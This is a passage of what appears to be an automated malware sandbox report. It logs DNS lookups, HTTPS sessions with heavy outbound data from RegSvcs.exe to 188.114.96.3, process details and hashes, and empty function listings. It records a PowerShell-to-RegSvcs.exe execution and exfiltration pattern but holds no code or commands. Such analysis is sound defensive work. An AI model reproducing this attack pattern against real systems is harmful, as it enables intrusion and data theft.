| Jan 14, 2025 08:27:22.164560080 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:22.164673090 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:22.164714098 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:22.164840937 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:22.164871931 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:22.164967060 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:22.164988041 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.371710062 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.371819019 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.371893883 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.372198105 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.372225046 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.378184080 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.378249884 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.378324032 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.378642082 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.378657103 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.845788956 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.845891953 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.847424030 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.847443104 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.847768068 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:24.849092007 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.849128962 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:24.849200964 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:25.345873117 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:25.345995903 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:25.346074104 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:25.346295118 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:25.346326113 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:25.346338987 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:25.346344948 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 14, 2025 08:27:11.792084932 CET | 49447 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.801541090 CET | 53 | 49447 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.805855036 CET | 58984 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.814053059 CET | 53 | 58984 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.817677021 CET | 60549 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.826939106 CET | 53 | 60549 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.830324888 CET | 56901 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.838896036 CET | 53 | 56901 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.848565102 CET | 60048 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.857649088 CET | 53 | 60048 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.877254963 CET | 64720 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.886056900 CET | 53 | 64720 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.893390894 CET | 60715 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.901957989 CET | 53 | 60715 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.905812025 CET | 54093 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.915172100 CET | 53 | 54093 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.927906036 CET | 53855 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.938083887 CET | 53 | 53855 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.943125963 CET | 58421 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:11.949949980 CET | 53 | 58421 | 1.1.1.1 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.327888012 CET | 53741 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 14, 2025 08:27:13.335834026 CET | 53 | 53741 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 14, 2025 08:27:11.792084932 CET | 192.168.2.4 | 1.1.1.1 | 0x1c10 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.805855036 CET | 192.168.2.4 | 1.1.1.1 | 0x8741 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.817677021 CET | 192.168.2.4 | 1.1.1.1 | 0x353c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.830324888 CET | 192.168.2.4 | 1.1.1.1 | 0x5352 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.848565102 CET | 192.168.2.4 | 1.1.1.1 | 0xbebd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.877254963 CET | 192.168.2.4 | 1.1.1.1 | 0x4a9d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.893390894 CET | 192.168.2.4 | 1.1.1.1 | 0x2250 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.905812025 CET | 192.168.2.4 | 1.1.1.1 | 0xb2e8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.927906036 CET | 192.168.2.4 | 1.1.1.1 | 0x221f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.943125963 CET | 192.168.2.4 | 1.1.1.1 | 0x501a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:13.327888012 CET | 192.168.2.4 | 1.1.1.1 | 0x26a6 | Standard query (0) | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 14, 2025 08:27:11.801541090 CET | 1.1.1.1 | 192.168.2.4 | 0x1c10 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.814053059 CET | 1.1.1.1 | 192.168.2.4 | 0x8741 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.826939106 CET | 1.1.1.1 | 192.168.2.4 | 0x353c | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.838896036 CET | 1.1.1.1 | 192.168.2.4 | 0x5352 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.857649088 CET | 1.1.1.1 | 192.168.2.4 | 0xbebd | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.886056900 CET | 1.1.1.1 | 192.168.2.4 | 0x4a9d | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.901957989 CET | 1.1.1.1 | 192.168.2.4 | 0x2250 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.915172100 CET | 1.1.1.1 | 192.168.2.4 | 0xb2e8 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.938083887 CET | 1.1.1.1 | 192.168.2.4 | 0x221f | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 08:27:11.949949980 CET | 1.1.1.1 | 192.168.2.4 | 0x501a | No error (0) | 104.102.49.254 | A (IP address) | IN (0x0001) | false | ||
| Jan 14, 2025 08:27:13.335834026 CET | 1.1.1.1 | 192.168.2.4 | 0x26a6 | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
| Jan 14, 2025 08:27:13.335834026 CET | 1.1.1.1 | 192.168.2.4 | 0x26a6 | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:12 UTC | 219 | OUT | |
| 2025-01-14 07:27:13 UTC | 1905 | IN | |
| 2025-01-14 07:27:13 UTC | 14479 | IN | |
| 2025-01-14 07:27:13 UTC | 16384 | IN | |
| 2025-01-14 07:27:13 UTC | 3768 | IN | |
| 2025-01-14 07:27:13 UTC | 510 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:13 UTC | 266 | OUT | |
| 2025-01-14 07:27:13 UTC | 8 | OUT | |
| 2025-01-14 07:27:14 UTC | 1127 | IN | |
| 2025-01-14 07:27:14 UTC | 7 | IN | |
| 2025-01-14 07:27:14 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:14 UTC | 267 | OUT | |
| 2025-01-14 07:27:14 UTC | 49 | OUT | |
| 2025-01-14 07:27:15 UTC | 1131 | IN | |
| 2025-01-14 07:27:15 UTC | 238 | IN | |
| 2025-01-14 07:27:15 UTC | 1369 | IN | |
| 2025-01-14 07:27:15 UTC | 1369 | IN | |
| 2025-01-14 07:27:15 UTC | 1369 | IN | |
| 2025-01-14 07:27:15 UTC | 1369 | IN | |
| 2025-01-14 07:27:15 UTC | 1369 | IN | |
| 2025-01-14 07:27:15 UTC | 1369 | IN | |
| 2025-01-14 07:27:15 UTC | 1369 | IN | |
| 2025-01-14 07:27:15 UTC | 1369 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:15 UTC | 275 | OUT | |
| 2025-01-14 07:27:15 UTC | 15331 | OUT | |
| 2025-01-14 07:27:15 UTC | 2774 | OUT | |
| 2025-01-14 07:27:17 UTC | 1130 | IN | |
| 2025-01-14 07:27:17 UTC | 20 | IN | |
| 2025-01-14 07:27:17 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:17 UTC | 277 | OUT | |
| 2025-01-14 07:27:17 UTC | 8744 | OUT | |
| 2025-01-14 07:27:18 UTC | 1123 | IN | |
| 2025-01-14 07:27:18 UTC | 20 | IN | |
| 2025-01-14 07:27:18 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:19 UTC | 278 | OUT | |
| 2025-01-14 07:27:19 UTC | 15331 | OUT | |
| 2025-01-14 07:27:19 UTC | 5066 | OUT | |
| 2025-01-14 07:27:19 UTC | 1139 | IN | |
| 2025-01-14 07:27:19 UTC | 20 | IN | |
| 2025-01-14 07:27:19 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 6 | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:20 UTC | 282 | OUT | |
| 2025-01-14 07:27:20 UTC | 1387 | OUT | |
| 2025-01-14 07:27:21 UTC | 1131 | IN | |
| 2025-01-14 07:27:21 UTC | 20 | IN | |
| 2025-01-14 07:27:21 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 7 | 192.168.2.4 | 49745 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:22 UTC | 279 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:22 UTC | 15331 | OUT | |
| 2025-01-14 07:27:24 UTC | 1138 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 8 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 07:27:24 UTC | 267 | OUT | |
| 2025-01-14 07:27:24 UTC | 84 | OUT | |
| 2025-01-14 07:27:25 UTC | 1129 | IN | |
| 2025-01-14 07:27:25 UTC | 54 | IN | |
| 2025-01-14 07:27:25 UTC | 5 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
| Target ID: | 0 |
| Start time: | 02:27:08 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff788560000 |
| File size: | 452'608 bytes |
| MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 1 |
| Start time: | 02:27:08 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff7699e0000 |
| File size: | 862'208 bytes |
| MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 2 |
| Start time: | 02:27:11 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x250000 |
| File size: | 45'984 bytes |
| MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 3 |
| Start time: | 02:27:11 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x40000 |
| File size: | 45'984 bytes |
| MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 4 |
| Start time: | 02:27:11 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xbe0000 |
| File size: | 45'984 bytes |
| MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 5 |
| Start time: | 02:27:11 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\System32\wermgr.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff783f90000 |
| File size: | 229'728 bytes |
| MD5 hash: | 74A0194782E039ACE1F7349544DC1CF4 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Has exited: | true |
Execution Graph
| Execution Coverage: | 1.9% |
| Dynamic/Decrypted Code Coverage: | 0% |
| Signature Coverage: | 0% |
| Total number of Nodes: | 7 |
| Total number of Limit Nodes: | 0 |
Graph
Function 00007FFD9B970FA4 Relevance: 2.0, Instructions: 2009COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FFD9B971390 Relevance: .2, Instructions: 174COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FFD9B8AA769 Relevance: .1, Instructions: 140COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FFD9B8AA7A0 Relevance: .1, Instructions: 103COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Execution Graph
| Execution Coverage: | 8.9% |
| Dynamic/Decrypted Code Coverage: | 0% |
| Signature Coverage: | 47.7% |
| Total number of Nodes: | 327 |
| Total number of Limit Nodes: | 19 |
Graph
Function 0043B7B0 Relevance: 23.6, APIs: 11, Strings: 2, Instructions: 851memorycomCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00408740 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228threadCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040CB44 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00410446 Relevance: 2.4, APIs: 1, Instructions: 941COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00427A50 Relevance: 1.7, Strings: 1, Instructions: 403COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004402D0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040BA29 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042D420 Relevance: .1, Instructions: 122COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004406A2 Relevance: 3.0, APIs: 2, Instructions: 14COMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00432D44 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042F596 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042F586 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043AA74 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004358EF Relevance: 1.5, APIs: 1, Instructions: 26COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00432648 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043E860 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043E840 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00425E00 Relevance: 34.2, Strings: 27, Instructions: 430COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004251E8 Relevance: 34.2, Strings: 27, Instructions: 426COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00417451 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040A910 Relevance: 6.7, Strings: 5, Instructions: 422COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00420B10 Relevance: 5.5, Strings: 4, Instructions: 470COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042F799 Relevance: 5.4, Strings: 4, Instructions: 395COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00408EB0 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0041AA90 Relevance: 4.4, Strings: 3, Instructions: 606COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004095A0 Relevance: 4.1, Strings: 3, Instructions: 375COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042E5C2 Relevance: 3.9, Strings: 3, Instructions: 189COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00413E50 Relevance: 3.4, Strings: 2, Instructions: 884COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0041F710 Relevance: 3.0, Strings: 2, Instructions: 527COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043C410 Relevance: 2.8, Strings: 2, Instructions: 349COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042DFAF Relevance: 2.6, Strings: 2, Instructions: 124COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042E7EB Relevance: 2.6, Strings: 2, Instructions: 108COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004273A0 Relevance: 1.6, Strings: 1, Instructions: 311COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004082A0 Relevance: 1.5, Strings: 1, Instructions: 288COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042E002 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
